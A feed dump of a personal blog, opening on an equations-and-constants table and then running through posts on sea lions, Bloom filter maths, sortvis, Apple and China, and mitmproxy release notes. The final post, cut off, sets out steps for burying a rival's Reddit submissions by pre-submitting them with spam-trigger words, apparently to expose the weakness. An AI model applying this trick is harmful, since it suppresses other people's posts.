</td> </tr> <tr> <td style="text-align: center;" class="factor_even">2</td> <td> <img src="7.png"/> </td> </tr> </table> <h2><a href="http://en.wikipedia.org/wiki/Euler%27s_equation">Euler&#39;s equation</a></h2> <table> <th>constant</th> <th>expression</th> <tr> <td style="text-align: center;" class="factor_none">None</td> <td> <img src="8.png"/> </td> </tr> </table> <h2><a href="http://en.wikipedia.org/wiki/Friedmann_equations">Friedmann equations</a></h2> <table> <th>constant</th> <th>expression</th> <tr> <td style="text-align: center;" class="factor_even">8</td> <td> <img src="9.png"/> </td> </tr> <tr> <td style="text-align: center;" class="factor_even">4</td> 
<td> <img src="10.png"/> </td> </tr> <tr> <td style="text-align: center;" class="factor_even">8</td> <td> <img src="11.png"/> </td> </tr> <tr> <td style="text-align: center;" class="factor_even">8</td> <td> <img src="12.png"/> </td> </tr> <tr> <td style="text-align: center;" class="factor_even">8</td> <td> <img src="13.png"/> </td> </tr> <tr> <td style="text-align: center;" class="factor_even">4</td> <td> <img src="14.png"/> </td> </tr> <tr> <td style="text-align: center;" class="factor_even">8</td> <td> <img src="15.png"/> </td> </tr> <tr> <td style="text-align: center;" class="factor_even">8</td> <td> <img src="16.png"/> </td> </tr> <tr> <td style="text-align: center;" class="factor_even">8</td> <td> <img src="17.png"/> </td> </tr> <tr> <td style="text-align: center;" class="factor_even">8</td> <td> <img src="18.png"/> </td> </tr> </table> <h2><a href="http://en.wikipedia.org/wiki/Vlasov_equation">Vlasov equation</a></h2> <table> <th>constant</th> <th>expression</th> <tr> <td style="text-align: center;" class="factor_even">4</td> <td> <img src="19.png"/> </td> </tr> <tr> <td style="text-align: center;" class="factor_even">4</td> <td> <img src="20.png"/> </td> </tr> <tr> <td style="text-align: center;" class="factor_even">4</td> <td> <img src="21.png"/> </td> </tr> </table> <h2><a href="http://en.wikipedia.org/wiki/Screened_Poisson_equation">Screened Poisson equation</a></h2> <table> <th>constant</th> <th>expression</th> <tr> <td style="text-align: center;" class="factor_even">4</td> <td> <img src="22.png"/> </td> </tr> <tr> <td style="text-align: center;" class="factor_even">2</td> <td> <img src="23.png"/> </td> </tr> <tr> <td style="text-align: center;" class="factor_even">2</td> <td> <img src="24.png"/> </td> </tr> <tr> <td style="text-align: center;" class="factor_even">4</td> <td> <img src="25.png"/> </td> </tr> <tr> <td style="text-align: center;" class="factor_even">4</td> <td> <img src="26.png"/> </td> </tr> </table> <h2><a 
href="http://en.wikipedia.org/wiki/Quadratic_equation">Quadratic equation</a></h2> <table> <th>constant</th> <th>expression</th> <tr> <td style="text-align: center;" class="factor_even">4</td> <td> <img src="27.png"/> </td> </tr> <tr> <td style="text-align: center;" class="factor_even">2</td> <td> <img src="28.png"/> </td> </tr> </table> <h2><a href="http://en.wikipedia.org/wiki/Stokes-Einstein_relation">Stokes-Einstein relation</a></h2> <table> <th>constant</th> <th>expression</th> <tr> <td style="text-align: center;" class="factor_even">6</td> <td> <img src="29.png"/> </td> </tr> <tr> <td style="text-align: center;" class="factor_even">6</td> <td> <img src="30.png"/> </td> </tr> <tr> <td style="text-align: center;" class="factor_even">6</td> <td> <img src="31.png"/> </td> </tr> </table> <h2><a href="http://en.wikipedia.org/wiki/Fisher_equation">Fisher equation</a></h2> <table> <th>constant</th> <th>expression</th> <tr> <td style="text-align: center;" class="factor_none">None</td> <td> <img src="32.png"/> </td> </tr> <tr> <td style="text-align: center;" class="factor_none">None</td> <td> <img src="33.png"/> </td> </tr> <tr> <td style="text-align: center;" class="factor_odd">None</td> <td> <img src="34.png"/> </td> </tr> <tr> <td style="text-align: center;" class="factor_none">None</td> <td> <img src="35.png"/> </td> </tr> </table> <h2><a href="http://en.wikipedia.org/wiki/Einstein%27s_field_equation">Einstein&#39;s field equation</a></h2> <table> <th>constant</th> <th>expression</th> <tr> <td style="text-align: center;" class="factor_even">8</td> <td> <img src="36.png"/> </td> </tr> <tr> <td style="text-align: center;" class="factor_even">8</td> <td> <img src="37.png"/> </td> </tr> <tr> <td style="text-align: center;" class="factor_even">8</td> <td> <img src="38.png"/> </td> </tr> <tr> <td style="text-align: center;" class="factor_even">8</td> <td> <img src="39.png"/> </td> </tr> <tr> <td style="text-align: center;" class="factor_even">8</td> <td> <img 
src="40.png"/> </td> </tr> <tr> <td style="text-align: center;" class="factor_even">8</td> <td> <img src="41.png"/> </td> </tr> <tr> <td style="text-align: center;" class="factor_even">8</td> <td> <img src="42.png"/> </td> </tr> <tr> <td style="text-align: center;" class="factor_even">8</td> <td> <img src="43.png"/> </td> </tr> <tr> <td style="text-align: center;" class="factor_even">8</td> <td> <img src="44.png"/> </td> </tr> <tr> <td style="text-align: center;" class="factor_even">8</td> <td> <img src="45.png"/> </td> </tr> <tr> <td style="text-align: center;" class="factor_even">8</td> <td> <img src="46.png"/> </td> </tr> <tr> <td style="text-align: center;" class="factor_even">8</td> <td> <img src="47.png"/> </td> </tr> <tr> <td style="text-align: center;" class="factor_even">4</td> <td> <img src="48.png"/> </td> </tr> <tr> <td style="text-align: center;" class="factor_even">4</td> <td> <img src="49.png"/> </td> </tr> <tr> <td style="text-align: center;" class="factor_even">4</td> <td> <img src="50.png"/> </td> </tr> <tr> <td style="text-align: center;" class="factor_even">8</td> <td> <img src="51.png"/> </td> </tr> <tr> <td style="text-align: center;" class="factor_even">8</td> <td> <img src="52.png"/> </td> </tr> </table> <h2><a href="http://en.wikipedia.org/wiki/Sackur-Tetrode_equation">Sackur-Tetrode equation</a></h2> <table> <th>constant</th> <th>expression</th> <tr> <td style="text-align: center;" class="factor_even">4</td> <td> <img src="53.png"/> </td> </tr> </table> <h2><a href="http://en.wikipedia.org/wiki/Laplace%27s_equation">Laplace&#39;s equation</a></h2> <table> <th>constant</th> <th>expression</th> <tr> <td style="text-align: center;" class="factor_none">None</td> <td> <img src="54.png"/> </td> </tr> <tr> <td style="text-align: center;" class="factor_even">4</td> <td> <img src="55.png"/> </td> </tr> <tr> <td style="text-align: center;" class="factor_even">4</td> <td> <img src="56.png"/> </td> </tr> <tr> <td style="text-align: center;" 
class="factor_even">4</td> <td> <img src="57.png"/> </td> </tr> <tr> <td style="text-align: center;" class="factor_even">2</td> <td> <img src="58.png"/> </td> </tr> <tr> <td style="text-align: center;" class="factor_even">4</td> <td> <img src="59.png"/> </td> </tr> <tr> <td style="text-align: center;" class="factor_even">4</td> <td> <img src="60.png"/> </td> </tr> </table> <h2><a href="http://en.wikipedia.org/wiki/Cauchy-Riemann_equations">Cauchy-Riemann equations</a></h2> <table> <th>constant</th> <th>expression</th> <tr> <td style="text-align: center;" class="factor_even">2</td> <td> <img src="61.png"/> </td> </tr> </table> <h2><a href="http://en.wikipedia.org/wiki/Cubic_equation">Cubic equation</a></h2> <table> <th>constant</th> <th>expression</th> <tr> <td style="text-align: center;" class="factor_even">2</td> <td> <img src="62.png"/> </td> </tr> <tr> <td style="text-align: center;" class="factor_even">2</td> <td> <img src="63.png"/> </td> </tr> <tr> <td style="text-align: center;" class="factor_even">2</td> <td> <img src="64.png"/> </td> </tr> <tr> <td style="text-align: center;" class="factor_even">4</td> <td> <img src="65.png"/> </td> </tr> <tr> <td style="text-align: center;" class="factor_even">2</td> <td> <img src="66.png"/> </td> </tr> </table> <h2><a href="http://en.wikipedia.org/wiki/Partial_differential_equation">Partial differential equation</a></h2> <table> <th>constant</th> <th>expression</th> <tr> <td style="text-align: center;" class="factor_even">2</td> <td> <img src="67.png"/> </td> </tr> <tr> <td style="text-align: center;" class="factor_even">2</td> <td> <img src="68.png"/> </td> </tr> <tr> <td style="text-align: center;" class="factor_even">2</td> <td> <img src="69.png"/> </td> </tr> <tr> <td style="text-align: center;" class="factor_even">2</td> <td> <img src="70.png"/> </td> </tr> <tr> <td style="text-align: center;" class="factor_none">None</td> <td> <img src="71.png"/> </td> </tr> <tr> <td style="text-align: center;" 
class="factor_even">2</td> <td> <img src="72.png"/> </td> </tr> <tr> <td style="text-align: center;" class="factor_none">None</td> <td> <img src="73.png"/> </td> </tr> </table> <h2><a href="http://en.wikipedia.org/wiki/Lane-Emden_equation">Lane-Emden equation</a></h2> <table> <th>constant</th> <th>expression</th> <tr> <td style="text-align: center;" class="factor_even">4</td> <td> <img src="74.png"/> </td> </tr> </table> <h2><a href="http://en.wikipedia.org/wiki/Heat_equation">Heat equation</a></h2> <table> <th>constant</th> <th>expression</th> <tr> <td style="text-align: center;" class="factor_none">None</td> <td> <img src="75.png"/> </td> </tr> <tr> <td style="text-align: center;" class="factor_none">None</td> <td> <img src="76.png"/> </td> </tr> <tr> <td style="text-align: center;" class="factor_none">None</td> <td> <img src="77.png"/> </td> </tr> <tr> <td style="text-align: center;" class="factor_none">None</td> <td> <img src="78.png"/> </td> </tr> <tr> <td style="text-align: center;" class="factor_even">2</td> <td> <img src="79.png"/> </td> </tr> <tr> <td style="text-align: center;" class="factor_even">4</td> <td> <img src="80.png"/> </td> </tr> <tr> <td style="text-align: center;" class="factor_even">4</td> <td> <img src="81.png"/> </td> </tr> <tr> <td style="text-align: center;" class="factor_even">4</td> <td> <img src="82.png"/> </td> </tr> <tr> <td style="text-align: center;" class="factor_even">4</td> <td> <img src="83.png"/> </td> </tr> <tr> <td style="text-align: center;" class="factor_even">4</td> <td> <img src="84.png"/> </td> </tr> <tr> <td style="text-align: center;" class="factor_even">4</td> <td> <img src="85.png"/> </td> </tr> <tr> <td style="text-align: center;" class="factor_even">4</td> <td> <img src="86.png"/> </td> </tr> <tr> <td style="text-align: center;" class="factor_even">4</td> <td> <img src="87.png"/> </td> </tr> <tr> <td style="text-align: center;" class="factor_even">4</td> <td> <img src="88.png"/> </td> </tr> <tr> <td 
style="text-align: center;" class="factor_even">4</td> <td> <img src="89.png"/> </td> </tr> <tr> <td style="text-align: center;" class="factor_even">2</td> <td> <img src="90.png"/> </td> </tr> <tr> <td style="text-align: center;" class="factor_even">2</td> <td> <img src="91.png"/> </td> </tr> </table> <h2><a href="http://en.wikipedia.org/wiki/Wave_equation">Wave equation</a></h2> <table> <th>constant</th> <th>expression</th> <tr> <td style="text-align: center;" class="factor_even">4</td> <td> <img src="92.png"/> </td> </tr> <tr> <td style="text-align: center;" class="factor_even">4</td> <td> <img src="93.png"/> </td> </tr> <tr> <td style="text-align: center;" class="factor_even">4</td> <td> <img src="94.png"/> </td> </tr> <tr> <td style="text-align: center;" class="factor_even">2</td> <td> <img src="95.png"/> </td> </tr> </table> <h2><a href="http://en.wikipedia.org/wiki/Primitive_equations">Primitive equations</a></h2> <table> <th>constant</th> <th>expression</th> <tr> <td style="text-align: center;" class="factor_none">None</td> <td> <img src="96.png"/> </td> </tr> <tr> <td style="text-align: center;" class="factor_none">None</td> <td> <img src="97.png"/> </td> </tr> </table> <h2><a href="http://en.wikipedia.org/wiki/Quintic_equation">Quintic equation</a></h2> <table> <th>constant</th> <th>expression</th> <tr> <td style="text-align: center;" class="factor_even">2</td> <td> <img src="98.png"/> </td> </tr> <tr> <td style="text-align: center;" class="factor_even">2</td> <td> <img src="99.png"/> </td> </tr> <tr> <td style="text-align: center;" class="factor_even">2</td> <td> <img src="100.png"/> </td> </tr> <tr> <td style="text-align: center;" class="factor_even">2</td> <td> <img src="101.png"/> </td> </tr> <tr> <td style="text-align: center;" class="factor_even">2</td> <td> <img src="102.png"/> </td> </tr> </table> <h2><a href="http://en.wikipedia.org/wiki/Black%E2%80%93Scholes_equation">Black–Scholes equation</a></h2> <table> <th>constant</th> <th>expression</th> 
<tr> <td style="text-align: center;" class="factor_even">2</td> <td> <img src="103.png"/> </td> </tr> <tr> <td style="text-align: center;" class="factor_even">2</td> <td> <img src="104.png"/> </td> </tr> <tr> <td style="text-align: center;" class="factor_even">2</td> <td> <img src="105.png"/> </td> </tr> </table> <h2><a href="http://en.wikipedia.org/wiki/Fredholm_integral_equation">Fredholm integral equation</a></h2> <table> <th>constant</th> <th>expression</th> <tr> <td style="text-align: center;" class="factor_even">2</td> <td> <img src="106.png"/> </td> </tr> </table> <h2><a href="http://en.wikipedia.org/wiki/Poisson%27s_equation">Poisson&#39;s equation</a></h2> <table> <th>constant</th> <th>expression</th> <tr> <td style="text-align: center;" class="factor_even">2</td> <td> <img src="107.png"/> </td> </tr> <tr> <td style="text-align: center;" class="factor_even">4</td> <td> <img src="108.png"/> </td> </tr> <tr> <td style="text-align: center;" class="factor_even">4</td> <td> <img src="109.png"/> </td> </tr> </table> <h2><a href="http://en.wikipedia.org/wiki/Helmholtz_Equation">Helmholtz Equation</a></h2> <table> <th>constant</th> <th>expression</th> <tr> <td style="text-align: center;" class="factor_even">4</td> <td> <img src="110.png"/> </td> </tr> </table> <h2><a href="http://en.wikipedia.org/wiki/Van_der_Waals_equation">Van der Waals equation</a></h2> <table> <th>constant</th> <th>expression</th> <tr> <td style="text-align: center;" class="factor_even">4</td> <td> <img src="111.png"/> </td> </tr> <tr> <td style="text-align: center;" class="factor_even">4</td> <td> <img src="112.png"/> </td> </tr> <tr> <td style="text-align: center;" class="factor_even">2</td> <td> <img src="113.png"/> </td> </tr> <tr> <td style="text-align: center;" class="factor_even">4</td> <td> <img src="114.png"/> </td> </tr> <tr> <td style="text-align: center;" class="factor_even">2</td> <td> <img src="115.png"/> </td> </tr> </table> <h2><a 
href="http://en.wikipedia.org/wiki/Lorentz_equation">Lorentz equation</a></h2> <table> <th>constant</th> <th>expression</th> <tr> <td style="text-align: center;" class="factor_even">4</td> <td> <img src="116.png"/> </td> </tr> <tr> <td style="text-align: center;" class="factor_even">4</td> <td> <img src="117.png"/> </td> </tr> <tr> <td style="text-align: center;" class="factor_even">4</td> <td> <img src="118.png"/> </td> </tr> </table> <h2><a href="http://en.wikipedia.org/wiki/Maxwell%27s_equations">Maxwell&#39;s equations</a></h2> <table> <th>constant</th> <th>expression</th> <tr> <td style="text-align: center;" class="factor_even">4</td> <td> <img src="119.png"/> </td> </tr> <tr> <td style="text-align: center;" class="factor_even">4</td> <td> <img src="120.png"/> </td> </tr> <tr> <td style="text-align: center;" class="factor_even">4</td> <td> <img src="121.png"/> </td> </tr> <tr> <td style="text-align: center;" class="factor_even">4</td> <td> <img src="122.png"/> </td> </tr> <tr> <td style="text-align: center;" class="factor_even">4</td> <td> <img src="123.png"/> </td> </tr> <tr> <td style="text-align: center;" class="factor_even">4</td> <td> <img src="124.png"/> </td> </tr> <tr> <td style="text-align: center;" class="factor_even">4</td> <td> <img src="125.png"/> </td> </tr> <tr> <td style="text-align: center;" class="factor_even">4</td> <td> <img src="126.png"/> </td> </tr> <tr> <td style="text-align: center;" class="factor_even">4</td> <td> <img src="127.png"/> </td> </tr> <tr> <td style="text-align: center;" class="factor_even">4</td> <td> <img src="128.png"/> </td> </tr> <tr> <td style="text-align: center;" class="factor_even">4</td> <td> <img src="129.png"/> </td> </tr> <tr> <td style="text-align: center;" class="factor_even">4</td> <td> <img src="130.png"/> </td> </tr> <tr> <td style="text-align: center;" class="factor_even">4</td> <td> <img src="131.png"/> </td> </tr> <tr> <td style="text-align: center;" class="factor_even">4</td> <td> <img src="132.png"/> 
</td> </tr> <tr> <td style="text-align: center;" class="factor_even">4</td> <td> <img src="133.png"/> </td> </tr> </table> Sea lions and lifestyle change 2010-09-02T00:00:00+00:00 2010-09-02T00:00:00+00:00 https://corte.si/posts/photos/sealions-and-lifestyle/ <p>About a year and a half ago, after dinner at a favourite local restaurant, and having entered into that zone of philosophical clarity that sets in around the dessert wine, my wife and I had the sudden simultaneous realisation that it was time for a change. For most of our adult lives, we had lived in the suburb of Newtown in Sydney - a hyper-urban jungle densely packed with coffee shops and theatres, inhabited by a thronging mixture of students and bohemians with counterculturally-correct hairdos. It was all beginning to seem a bit tired and same-ish. We needed more time and more space. We needed to get back to the essentials of life.</p> <p>Four weeks later our furniture was in a shipping container en route to Dunedin, a small university town near the southern tip of New Zealand. We decided to work together from home, keeping our schedules flexible to make time for walks, reading, cooking, and (more recently) spending time with our son. It was a huge risk - it was quite possible that the isolation would impose a punishing work travel regime on me, or put a crimp in my wife's very specialised career in linguistics. It took enterprise, determination and no small amount of possibly-foolish optimism, but it's all worked out. Our leap of faith has turned out to be one of the best decisions we've ever made. 
Dunedin is a breathtakingly beautiful place to live - I still can't quite believe that I can get up from my desk, and within 20 minutes be on a deserted beach littered with lazy sea lions basking in the winter sun.</p> <p>My advice to you is this: when your life begins to seem a bit stuffy and constricted, when you begin to feel you've lost sight of something more fundamental and get the urge to refactor - <em>just do it</em>. There has never been a better time in history for people who choose to march to a different drum.</p> <p>To prove what a lucky fellow I am, here are two photos from my walk yesterday morning - click to view in a lightbox.</p> <div class="media"> <a href="male-full.jpg"> <img src="male.jpg" /> </a> </div> <p>It's not clear from the picture, but this is a massive New Zealand Sea Lion bull - about 400 kilograms of apparently boneless muscle and blubber.</p> <div class="media"> <a href="female-full.jpg"> <img src="female.jpg" /> </a> </div> <p>It's hard to believe that this sleek female is the same species as the dumpy, snub-nosed chap above. New Zealand Sea Lions are the rarest species of sea lion in the world - it's an immense privilege to be able to share a beach with them.</p> 3 Rules of thumb for Bloom Filters 2010-08-25T00:00:00+00:00 2010-08-25T00:00:00+00:00 https://corte.si/posts/code/bloom-filter-rules-of-thumb/ <p>I've spent a few days this week working on a side-project that relies heavily on Bloom Filters (look for a post on the result of my labours in the next week or so). 
If you don't know what a Bloom filter is, <a rel="external" href="http://en.wikipedia.org/wiki/Bloom_filter">you should probably find out</a> - they're very neat and have a <a rel="external" href="http://citeseerx.ist.psu.edu/viewdoc/download?doi=10.1.1.127.9672&amp;rep=rep1&amp;type=pdf">huge</a> <a rel="external" href="http://citeseerx.ist.psu.edu/viewdoc/download?doi=10.1.1.4.3831&amp;rep=rep1&amp;type=pdf">range</a> of <a rel="external" href="http://citeseerx.ist.psu.edu/viewdoc/download?doi=10.1.1.126.2458&amp;rep=rep1&amp;type=pdf">fascinating</a> <a rel="external" href="http://www.cs.cmu.edu/~dga/papers/fastcache-tr.pdf">applications</a>.</p> <p>I often need to do rough back-of-the-envelope reasoning about things, and I find that doing a bit of work to develop an intuition for how a new technique performs is usually worthwhile. So, here are three broad rules of thumb to remember when discussing Bloom filters down the pub:</p> <h3 id="1-one-byte-per-item-in-the-input-set-gives-about-a-2-false-positive-rate">1 - One byte per item in the input set gives about a 2% false positive rate.</h3> <p>In other words, we can add 1024 elements to a 1KB Bloom Filter, and check for set membership with about a 2% false positive rate. Nifty. Here are some common false positive rates and the approximate required bits per element, assuming an optimal choice of the number of hashes:</p> <table> <tr> <th>fp rate</th> <th>bits</th> </tr> <tr> <td>50%</td> <td>1.44</td> </tr> <tr> <td>10%</td> <td>4.79</td> </tr> <tr> <td>2%</td> <td>8.14</td> </tr> <tr> <td>1%</td> <td>9.58</td> </tr> <tr> <td>0.1%</td> <td>14.38</td> </tr> <tr> <td>0.01%</td> <td>19.17</td> </tr> </table> <p>Graphically, the relation between bits per element and the false positive rate when using an optimal number of hashes looks like this:</p> <div class="media"> <a href="graph.png"> <img src="graph.png" /> </a> <div class="subtitle"> Bits per element vs. 
false positive probability </div> </div><h3 id="2-the-optimal-number-of-hash-functions-is-about-0-7-times-the-number-of-bits-per-item">2 - The optimal number of hash functions is about 0.7 times the number of bits per item.</h3> <p>This means that the number of hashes is "small", varying from about 3 at a 10% false positive rate, to about 13 at a 0.01% false positive rate.</p> <h3 id="3-the-number-of-hashes-dominates-performance">3 - The number of hashes dominates performance.</h3> <p>The number of hashes determines the number of bits that need to be read to test for membership, the number of bits that need to be written to add an element, and the amount of computation needed to calculate the hashes themselves. We may sometimes choose to use a less than optimal number of hashes for performance reasons (especially when we choose to round down when the calculated optimal number of hashes is fractional).</p> <h2 id="the-maths">The maths</h2> <p>Let's do some maths to justify the above, starting with two well-known results about Bloom filters that can be found in every description of the data structure. First, by a combinatorial argument we can show that the probability <strong>p</strong> of a false positive is approximated by the following formula, where <strong>k</strong> is the number of hash functions, <strong>n</strong> is the size of the input set and <strong>m</strong> is the size of the Bloom filter in bits:</p> <div class="media"> <a href="formula-1.png"> <img src="formula-1.png" /> </a> </div> <p>Second, we know that <strong>k</strong> is optimal when:</p> <div class="media"> <a href="formula-2.png"> <img src="formula-2.png" /> </a> </div> <p>Notice that in this formula, <strong>m/n</strong> is the number of bits per element in the Bloom filter. 
So, the optimal number of hashes grows linearly with the number of bits per element (<strong>b</strong>):</p> <div class="media"> <a href="formula-6.png"> <img src="formula-6.png" /> </a> </div> <p>Assuming an optimal choice for <strong>k</strong> in the first formula, we get:</p> <div class="media"> <a href="formula-3.png"> <img src="formula-3.png" /> </a> </div> <p>Solving for <strong>m</strong>:</p> <div class="media"> <a href="formula-4.png"> <img src="formula-4.png" /> </a> </div> <p>It's clear from the above that for a given false-positive rate, the number of bits in a Bloom filter grows linearly with <strong>n</strong>. If we set <strong>n = 1</strong>, we get the following expression for the approximate number of bits needed per set element:</p> <div class="media"> <a href="formula-5.png"> <img src="formula-5.png" /> </a> </div> Love and war on Sandfly Beach 2010-08-16T00:00:00+00:00 2010-08-16T00:00:00+00:00 https://corte.si/posts/photos/sandflysealions/ <p>Hiked to the end of <a rel="external" href="http://en.wikipedia.org/wiki/Sandfly_Bay">Sandfly Bay</a> today. A strong North-Easter drove streams of fine beach-sand across the dunes, making it feel like we were wading knee-deep in a swift river of sand. Surreal and beautiful, but I was too afraid of getting grit into my camera to photograph the scene.</p> <p>At the end of the beach, we found two groups of <a rel="external" href="http://en.wikipedia.org/wiki/New_Zealand_Sea_Lion">New Zealand Sea Lions</a>. 
A female basking with two large cubs, and two young males sparring while a massive mature bull looked on.</p> <p>Click to view in full size.</p> <div class="media"> <a href="sealion_with_cubs_full.jpg"> <img src="sealion_with_cubs.jpg" /> </a> <div class="subtitle"> Sea lion with cubs </div> </div><div class="media"> <a href="sparring_sealions_full.jpg"> <img src="sparring_sealions.jpg" /> </a> <div class="subtitle"> Sparring sea lions </div> </div> sortvis.org 2010-07-14T00:00:00+00:00 2010-07-14T00:00:00+00:00 https://corte.si/posts/visualisation/sortvisdotorg/ <p>I've just put up <a rel="external" href="http://sortvis.org">sortvis.org</a>, the new official home of the <a rel="external" href="http://github.com/cortesi/sortvis">sortvis</a> sorting algorithm visualisation project. The site has a complete set of up-to-date images, explanations of the visualisation techniques, code snippets, and a rather snazzy Javascript image viewer to let you pan and zoom through the huge images produced by the sortvis <a rel="external" href="http://sortvis.org/visualisations.html">dense</a> visualisation. Take a look, and let me know what you think!</p> Taiaroa Head 2010-05-18T00:00:00+00:00 2010-05-18T00:00:00+00:00 https://corte.si/posts/photos/taiaroa/ <div class="media"> <a href="taiaroa-full.jpg"> <img src="taiaroa.jpg" /> </a> <div class="subtitle"> Taiaroa head </div> </div> <p>Taken on a stormy day from Aramoana Mole.</p> Apple, China and the war of ideas 2010-05-07T00:00:00+00:00 2010-05-07T00:00:00+00:00 https://corte.si/posts/politics/apple-is-china/ <p>There was a minor flap recently when <a rel="external" href="http://www.androidguys.com/2010/04/27/andy-rubin-reacts-steve-jobs-likens-apple-north-korea/">Andy Rubin compared Apple to North Korea</a>. Many <a rel="external" href="http://www.youtube.com/watch?v=lQKdEdzHnfU">turtle-necked Apple hipsters</a> had their feathers mildly ruffled, and bloggers gleefully reaped a tiny flurry of page impressions. 
Quite right too, because Rubin was clearly wrong. Apple is nothing like North Korea, because <strong>Apple is the China of the tech world</strong>. Lend me your ears for a minute, while I make a broad-strokes argument for this statement.</p> <div class="media"> <a href="mao.jpg"> <img src="mao.jpg" /> </a> </div> <p>Not so long ago, the consensus in the West was that political liberty and capitalism went hand-in-hand. Wherever one arose, the other would inevitably follow, and in their wake would come prosperity. When China started liberalising its markets, it seemed self-evident that the rise of capitalism in China would bring democracy in its wake. The Tiananmen Square protests in 1989 were supposed to be a sign of things to come, a precursor to wider revolution. The West's argument was persuasive - it was borne out by a century during which the world was a roiling cauldron of political and economic experimentation, and nearly every command economy had failed. Today, the international landscape has changed entirely. The West has had a catastrophic financial meltdown, and things are only getting worse. There is a sense that the US-led Western order is in decline, and the Chinese-led east is rising. China has been the fastest growing major economy in the world for a decade, and the Communist Party is more firmly in control than ever. Today, there's no apparent prospect of political reform. Chinese intellectuals and diplomats are beginning to mount an increasingly assertive and persuasive argument for a system of government that brings prosperity without liberty, and dictatorships the world over are listening very, very carefully.</p> <p>In the software world, we've also spent decades arguing that freedom and prosperity go hand in hand. 
This is the <a rel="external" href="http://en.wikipedia.org/wiki/Open_source_software#Open_source_software_vs._free_software">"Open Source"</a> justification for free software: a pragmatic position that we should have liberty not for its own sake, but because it produces better outcomes. This is also the argument behind open hardware platforms, behind open Internet standards, behind interoperability. Some bloody battles had to be fought with monopolists, but in the main the last 20 years have been a stunning success for openness. There has always been a <a rel="external" href="http://en.wikipedia.org/wiki/Richard_Stallman">minority</a> who have made a more fundamental case for liberty, but it's important to recognize that they have lost the debate. The engine that drives the most important Open Source projects is entirely based on a superficial utilitarianism - the Googles and IBMs of the world don't contribute to Open Source because they love liberty, but because the financial return they get from doing so is greater than their investment. The fundamental distinction between openness and free-ness hasn't been important so far, though, because ideology and utilitarian arguments were aligned. Now, things are changing. No-one can deny that Apple's mobile device strategy has been a complete slam-dunk. The iPhone is the <a rel="external" href="http://tech.fortune.cnn.com/2010/03/02/what-doth-it-profit-an-iphone/">most profitable handset out there</a> by far, and the iPad is shaping up to be huge. Apple's long-term plan is breathtakingly ambitious - it's making a play for complete dominance in the mobile market, with an integrated offering that controls everything from content to applications to the devices themselves. It's therefore making a play for total control of the way most people will experience computation in the near future. 
Not even the most die-hard free-software hippie can deny that Apple's success has been won on merit - their devices are simply, unmistakably better than the competition. Open platforms have been out-classed in almost every measurable dimension. So, we may be entering the next stage of the computer revolution with devices where every native application has to be approved by a single authority, where even programming languages and development tools are centrally controlled. Apple's competitors and imitators are watching and taking notes, because far from being punished by the market for this, Apple has profited beyond the wildest dreams of avarice.</p> <p>Apple and China have put pragmatists who also value freedom in a quandary. In the past, practice and ideology aligned neatly: political liberty and economic progress went hand in hand, and so did open platforms and commercial success. There are now powerful counter-examples to this line of thinking, and it seems clear that making a pragmatic argument for liberty has been a strategic mis-step both in politics and in technology. Advocates of freedom will have to turn back to more fundamental arguments: human rights, ethics and morality. We should recognize that at this point in time, we're losing the war of ideas. I must admit, in my darker moments I'm pessimistic about our ability to make the case persuasively to a disengaged public.</p> <p><strong>PS</strong></p> <p>To keep this post manageable, I've not talked about factors that muddy the waters for the technical side of the argument. For instance, I don't think Microsoft is a counter-example, and neither is Apple's support for open web standards. I'll save those for a future post. I'd also like to point out that I'm absolutely not anti-Apple - I own a lot of Apple gear that I use every day. 
My position regarding China's place in the world is a caricature of <a rel="external" href="http://en.wikipedia.org/wiki/Stefan_Halper">Stefan Halper</a>'s superb book <a rel="external" href="http://www.amazon.com/Beijing-Consensus-Authoritarian-Dominate-Twenty-First/dp/0465013619/">"The Beijing Consensus: How China's authoritarian model will dominate the twenty-first century"</a>. You can listen to him speaking about this book at the Cato Institute <a rel="external" href="http://www.cato.org/event.php?eventid=6990">over here</a>.</p> Sortvis updates 2010-04-01T00:00:00+00:00 2010-04-01T00:00:00+00:00 https://corte.si/posts/visualisation/sortvis-update/ <div class="media"> <a href="oddevensort.png"> <img src="oddevensort.png" /> </a> </div> <p>There have been some improvements to <a rel="external" href="http://sortvis.org">sortvis</a> - my sorting algorithm visualisation project - in the last few months. Graphs are now more balanced, with an equal lead-in and lead-off at the edges. There has also been a swathe of algorithm contributions - thanks to Aaron Gallagher and Chris Wong (the image above is of <a rel="external" href="http://en.wikipedia.org/wiki/Odd-even_sort">Odd-even Sort</a>, contributed by Aaron). As usual, you can find the code for all of this on <a rel="external" href="http://github.com/cortesi/sortvis">github</a>. I've updated the visualisation page on my blog with new graphs for all algorithms - go take a look <a rel="external" href="http://sortvis.org">here</a>.</p> <p>I plan to move sortvis and the collection of visualisations onto their own domain soon. I'm also thinking about making large wall-posters of the visualisations available. I plan to make some prints for myself, and I'm assuming that I'm not the only one geeky enough to want a sorting algorithm on my wall. 
Would anyone be interested?</p> mitmproxy 0.2 2010-03-01T00:00:00+00:00 2010-03-01T00:00:00+00:00 https://corte.si/posts/software/mitmproxy0_2/ <p>Just released <a rel="external" href="http://mitmproxy.org">mitmproxy 0.2</a>. Changes include:</p> <ul> <li>Big speed and responsiveness improvements, thanks to Thomas Roth</li> <li>Support urwid 0.9.9</li> <li>Terminal beeping based on filter expressions</li> <li>Filter expressions for terminal beeps, limits, interceptions and sticky cookies can now be passed on the command line.</li> <li>Save requests and responses to file</li> <li>Split off non-interactive dump functionality into a new tool called mitmdump</li> <li>"A" will now accept all intercepted connections</li> <li>Lots of bugfixes</li> </ul> How to stop a story from appearing on Reddit 2010-02-28T00:00:00+00:00 2010-02-28T00:00:00+00:00 https://corte.si/posts/socialmedia/reddit-story-dos/ <div class="media"> <a href="reddit-story-dos.jpg"> <img src="reddit-story-dos.jpg" /> </a> </div> <p>Mallory hates Bob. Bob has a blog about ponies, and Mallory knows that a large-ish fraction of Bob's traffic comes from the <a rel="external" href="http://www.reddit.com/r/ponies">ponies Subreddit</a>. If Bob's stories stopped appearing there it would make him sad, and Mallory, the venomous little sadist that he is, would rejoice. Here's how Mallory could accomplish the deed:</p> <ul> <li>Watch Bob's blog closely to make sure he's the first to submit Bob's posts to Reddit.</li> <li>Include some words that will trigger the spam-filter in the submission title. Any combination of "viagra" and "cialis" will do just fine.</li> <li>Sit back and cackle evilly.</li> </ul> <p>Now Bob's post is sitting in the spam queue on the ponies Subreddit. Since the post has already been submitted, the nice users who usually submit Bob's story can't re-submit it to the same Subreddit. 
